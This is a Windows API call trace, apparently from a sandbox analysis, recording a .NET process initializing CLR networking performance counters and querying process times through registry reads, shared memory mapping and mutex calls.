	[0900.152] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c5bd398 | out: TokenHandle=0x1c5bd398*=0x3f0) returned 1
	[0900.863] GetCurrentProcessId () returned 0x7f4
	[0900.881] CoTaskMemAlloc (cb=0x204) returned 0x3444e0
	[0900.881] GetComputerNameW (in: lpBuffer=0x3444e0, nSize=0x2f2ebb8 | out: lpBuffer="XDUWTFONO", nSize=0x2f2ebb8) returned 1
	[0900.881] CoTaskMemFree (pv=0x3444e0) 
	[0900.883] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5bd878 | out: phkResult=0x1c5bd878*=0x3f4) returned 0x0
	[0900.883] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Library", lpReserved=0x0, lpType=0x1c5bd7fc, lpData=0x0, lpcbData=0x1c5bd7f8*=0x0 | out: lpType=0x1c5bd7fc*=0x1, lpData=0x0, lpcbData=0x1c5bd7f8*=0x1c) returned 0x0
	[0900.883] CoTaskMemAlloc (cb=0x20) returned 0x1b712ed0
	[0900.883] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Library", lpReserved=0x0, lpType=0x1c5bd7cc, lpData=0x1b712ed0, lpcbData=0x1c5bd7c8*=0x1c | out: lpType=0x1c5bd7cc*=0x1, lpData="netfxperf.dll", lpcbData=0x1c5bd7c8*=0x1c) returned 0x0
	[0900.883] CoTaskMemFree (pv=0x1b712ed0) 
	[0900.883] RegQueryValueExW (in: hKey=0x3f4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c5bd7fc, lpData=0x0, lpcbData=0x1c5bd7f8*=0x0 | out: lpType=0x1c5bd7fc*=0x4, lpData=0x0, lpcbData=0x1c5bd7f8*=0x4) returned 0x0
	[0900.884] RegQueryValueExW (in: hKey=0x3f4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c5bd800, lpData=0x1c5bd7fc, lpcbData=0x1c5bd7f8*=0x4 | out: lpType=0x1c5bd800*=0x4, lpData=0x1c5bd7fc*=0x1, lpcbData=0x1c5bd7f8*=0x4) returned 0x0
	[0900.884] RegQueryValueExW (in: hKey=0x3f4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c5bd7fc, lpData=0x0, lpcbData=0x1c5bd7f8*=0x0 | out: lpType=0x1c5bd7fc*=0x4, lpData=0x0, lpcbData=0x1c5bd7f8*=0x4) returned 0x0
	[0900.884] RegQueryValueExW (in: hKey=0x3f4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c5bd800, lpData=0x1c5bd7fc, lpcbData=0x1c5bd7f8*=0x4 | out: lpType=0x1c5bd800*=0x4, lpData=0x1c5bd7fc*=0x137a, lpcbData=0x1c5bd7f8*=0x4) returned 0x0
	[0900.884] RegCloseKey (hKey=0x3f4) returned 0x0
	[0900.887] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c5bd838 | out: phkResult=0x1c5bd838*=0x3f4) returned 0x0
	[0900.887] RegQueryValueExW (in: hKey=0x3f4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c5bd7bc, lpData=0x0, lpcbData=0x1c5bd7b8*=0x0 | out: lpType=0x1c5bd7bc*=0x4, lpData=0x0, lpcbData=0x1c5bd7b8*=0x4) returned 0x0
	[0900.887] RegQueryValueExW (in: hKey=0x3f4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c5bd7c0, lpData=0x1c5bd7bc, lpcbData=0x1c5bd7b8*=0x4 | out: lpType=0x1c5bd7c0*=0x4, lpData=0x1c5bd7bc*=0x3, lpcbData=0x1c5bd7b8*=0x4) returned 0x0
	[0900.887] RegQueryValueExW (in: hKey=0x3f4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c5bd7bc, lpData=0x0, lpcbData=0x1c5bd7b8*=0x0 | out: lpType=0x1c5bd7bc*=0x4, lpData=0x0, lpcbData=0x1c5bd7b8*=0x4) returned 0x0
	[0900.888] RegQueryValueExW (in: hKey=0x3f4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c5bd7c0, lpData=0x1c5bd7bc, lpcbData=0x1c5bd7b8*=0x4 | out: lpType=0x1c5bd7c0*=0x4, lpData=0x1c5bd7bc*=0x20000, lpcbData=0x1c5bd7b8*=0x4) returned 0x0
	[0900.888] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c5bd7bc, lpData=0x0, lpcbData=0x1c5bd7b8*=0x0 | out: lpType=0x1c5bd7bc*=0x3, lpData=0x0, lpcbData=0x1c5bd7b8*=0xaa) returned 0x0
	[0900.888] RegQueryValueExW (in: hKey=0x3f4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c5bd7bc, lpData=0x2f31ea8, lpcbData=0x1c5bd7b8*=0xaa | out: lpType=0x1c5bd7bc*=0x3, lpData=0x2f31ea8*, lpcbData=0x1c5bd7b8*=0xaa) returned 0x0
	[0900.892] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0901.269] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c5bd770, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0901.270] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3fc
	[0901.273] MapViewOfFile (hFileMappingObject=0x3fc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2ba0000
	[0901.274] VirtualQuery (in: lpAddress=0x2ba0000, lpBuffer=0x1c5bd768, dwLength=0x30 | out: lpBuffer=0x1c5bd768*(BaseAddress=0x2ba0000, AllocationBase=0x2ba0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0901.274] LocalFree (hMem=0x2ff480) returned 0x0
	[0901.275] RegCloseKey (hKey=0x3f4) returned 0x0
	[0901.279] GetVersionExW (in: lpVersionInformation=0x1c5bc740*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c5bc740*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0901.280] GetVersionExW (in: lpVersionInformation=0x1c5bc710*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c5bc710*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0901.281] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f32b78, cbSid=0x1c5bd750 | out: pSid=0x2f32b78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd750) returned 1
	[0901.287] CreateMutexW (lpMutexAttributes=0x2f32d80, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.288] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.291] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0901.656] GetCurrentProcessId () returned 0x7f4
	[0901.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f4) returned 0x404
	[0901.658] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd660, lpExitTime=0x1c5bd658, lpKernelTime=0x1c5bd650, lpUserTime=0x1c5bd648 | out: lpCreationTime=0x1c5bd660, lpExitTime=0x1c5bd658, lpKernelTime=0x1c5bd650, lpUserTime=0x1c5bd648) returned 1
	[0901.658] CloseHandle (hObject=0x404) returned 1
	[0901.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1668) returned 0x404
	[0901.658] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.659] CloseHandle (hObject=0x404) returned 1
	[0901.659] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x1668) returned 0x404
	[0901.660] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.660] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.661] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.662] CloseHandle (hObject=0x408) returned 1
	[0901.662] CloseHandle (hObject=0x404) returned 1
	[0901.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14f0) returned 0x404
	[0901.663] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.663] CloseHandle (hObject=0x404) returned 1
	[0901.663] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x14f0) returned 0x404
	[0901.663] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.663] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.663] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.663] CloseHandle (hObject=0x408) returned 1
	[0901.664] CloseHandle (hObject=0x404) returned 1
	[0901.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf2c) returned 0x404
	[0901.664] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.664] CloseHandle (hObject=0x404) returned 1
	[0901.664] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf2c) returned 0x404
	[0901.664] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.664] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.664] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.664] CloseHandle (hObject=0x408) returned 1
	[0901.665] CloseHandle (hObject=0x404) returned 1
	[0901.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b8) returned 0x404
	[0901.665] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.665] CloseHandle (hObject=0x404) returned 1
	[0901.665] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x9b8) returned 0x404
	[0901.665] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.665] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.665] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.665] CloseHandle (hObject=0x408) returned 1
	[0901.666] CloseHandle (hObject=0x404) returned 1
	[0901.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcb0) returned 0x404
	[0901.666] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.666] CloseHandle (hObject=0x404) returned 1
	[0901.666] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xcb0) returned 0x404
	[0901.666] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.666] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.666] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.666] CloseHandle (hObject=0x408) returned 1
	[0901.667] CloseHandle (hObject=0x404) returned 1
	[0901.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x404
	[0901.667] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.667] CloseHandle (hObject=0x404) returned 1
	[0901.667] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf10) returned 0x404
	[0901.667] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.667] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.667] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.668] CloseHandle (hObject=0x408) returned 1
	[0901.668] CloseHandle (hObject=0x404) returned 1
	[0901.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x404
	[0901.668] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.668] CloseHandle (hObject=0x404) returned 1
	[0901.668] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x404
	[0901.668] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.668] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.668] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.669] CloseHandle (hObject=0x408) returned 1
	[0901.669] CloseHandle (hObject=0x404) returned 1
	[0901.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x404
	[0901.669] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.669] CloseHandle (hObject=0x404) returned 1
	[0901.669] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x404
	[0901.669] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.669] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.669] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.670] CloseHandle (hObject=0x408) returned 1
	[0901.670] CloseHandle (hObject=0x404) returned 1
	[0901.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x404
	[0901.670] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.670] CloseHandle (hObject=0x404) returned 1
	[0901.670] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x404
	[0901.670] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.670] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.670] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.671] CloseHandle (hObject=0x408) returned 1
	[0901.671] CloseHandle (hObject=0x404) returned 1
	[0901.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x404
	[0901.671] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.671] CloseHandle (hObject=0x404) returned 1
	[0901.671] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x404
	[0901.671] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.671] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.671] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.672] CloseHandle (hObject=0x408) returned 1
	[0901.672] CloseHandle (hObject=0x404) returned 1
	[0901.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x404
	[0901.672] GetProcessTimes (in: hProcess=0x404, lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8 | out: lpCreationTime=0x1c5bd6f0, lpExitTime=0x1c5bd6e8, lpKernelTime=0x1c5bd6e0, lpUserTime=0x1c5bd6d8) returned 1
	[0901.672] CloseHandle (hObject=0x404) returned 1
	[0901.672] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x404
	[0901.672] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.672] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.672] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c5bd648, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c5bd648*=0x408) returned 1
	[0901.673] CloseHandle (hObject=0x408) returned 1
	[0901.673] CloseHandle (hObject=0x404) returned 1
	[0901.675] ReleaseMutex (hMutex=0x3f4) returned 1
	[0901.675] CloseHandle (hObject=0x3f4) returned 1
	[0901.675] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f341e0, cbSid=0x1c5bd750 | out: pSid=0x2f341e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd750) returned 1
	[0901.675] CreateMutexW (lpMutexAttributes=0x2f34398, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.675] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.676] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0901.678] ReleaseMutex (hMutex=0x3f4) returned 1
	[0901.678] CloseHandle (hObject=0x3f4) returned 1
	[0901.679] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f35028, cbSid=0x1c5bd750 | out: pSid=0x2f35028*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd750) returned 1
	[0901.679] CreateMutexW (lpMutexAttributes=0x2f351e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.679] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.679] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0901.682] ReleaseMutex (hMutex=0x3f4) returned 1
	[0901.682] CloseHandle (hObject=0x3f4) returned 1
	[0901.682] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f35e80, cbSid=0x1c5bd750 | out: pSid=0x2f35e80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd750) returned 1
	[0901.682] CreateMutexW (lpMutexAttributes=0x2f36038, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.682] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.682] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0901.685] ReleaseMutex (hMutex=0x3f4) returned 1
	[0901.685] CloseHandle (hObject=0x3f4) returned 1
	[0901.686] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f36cd0, cbSid=0x1c5bd750 | out: pSid=0x2f36cd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd750) returned 1
	[0901.686] CreateMutexW (lpMutexAttributes=0x2f36e88, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.686] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.686] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0901.691] ReleaseMutex (hMutex=0x3f4) returned 1
	[0901.692] CloseHandle (hObject=0x3f4) returned 1
	[0901.694] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f37b20, cbSid=0x1c5bd700 | out: pSid=0x2f37b20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd700) returned 1
	[0901.694] CreateMutexW (lpMutexAttributes=0x2f37cd8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.694] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.694] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0901.697] ReleaseMutex (hMutex=0x3f4) returned 1
	[0901.697] CloseHandle (hObject=0x3f4) returned 1
	[0901.697] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f38960, cbSid=0x1c5bd700 | out: pSid=0x2f38960*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd700) returned 1
	[0901.697] CreateMutexW (lpMutexAttributes=0x2f38b18, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.698] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.698] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0901.998] ReleaseMutex (hMutex=0x3f4) returned 1
	[0901.999] CloseHandle (hObject=0x3f4) returned 1
	[0901.999] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f39798, cbSid=0x1c5bd700 | out: pSid=0x2f39798*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd700) returned 1
	[0901.999] CreateMutexW (lpMutexAttributes=0x2f39950, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.999] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0901.999] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0902.085] ReleaseMutex (hMutex=0x3f4) returned 1
	[0902.085] CloseHandle (hObject=0x3f4) returned 1
	[0902.085] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f3a5e0, cbSid=0x1c5bd700 | out: pSid=0x2f3a5e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd700) returned 1
	[0902.085] CreateMutexW (lpMutexAttributes=0x2f3a798, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.085] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0902.085] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0902.108] ReleaseMutex (hMutex=0x3f4) returned 1
	[0902.108] CloseHandle (hObject=0x3f4) returned 1
	[0902.109] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2f3b420, cbSid=0x1c5bd700 | out: pSid=0x2f3b420*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c5bd700) returned 1
	[0902.109] CreateMutexW (lpMutexAttributes=0x2f3b5d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.109] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x3f4
	[0902.109] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0
	[0902.113] ReleaseMutex (hMutex=0x3f4) returned 1
	[0902.113] CloseHandle (hObject=0x3f4) returned 1
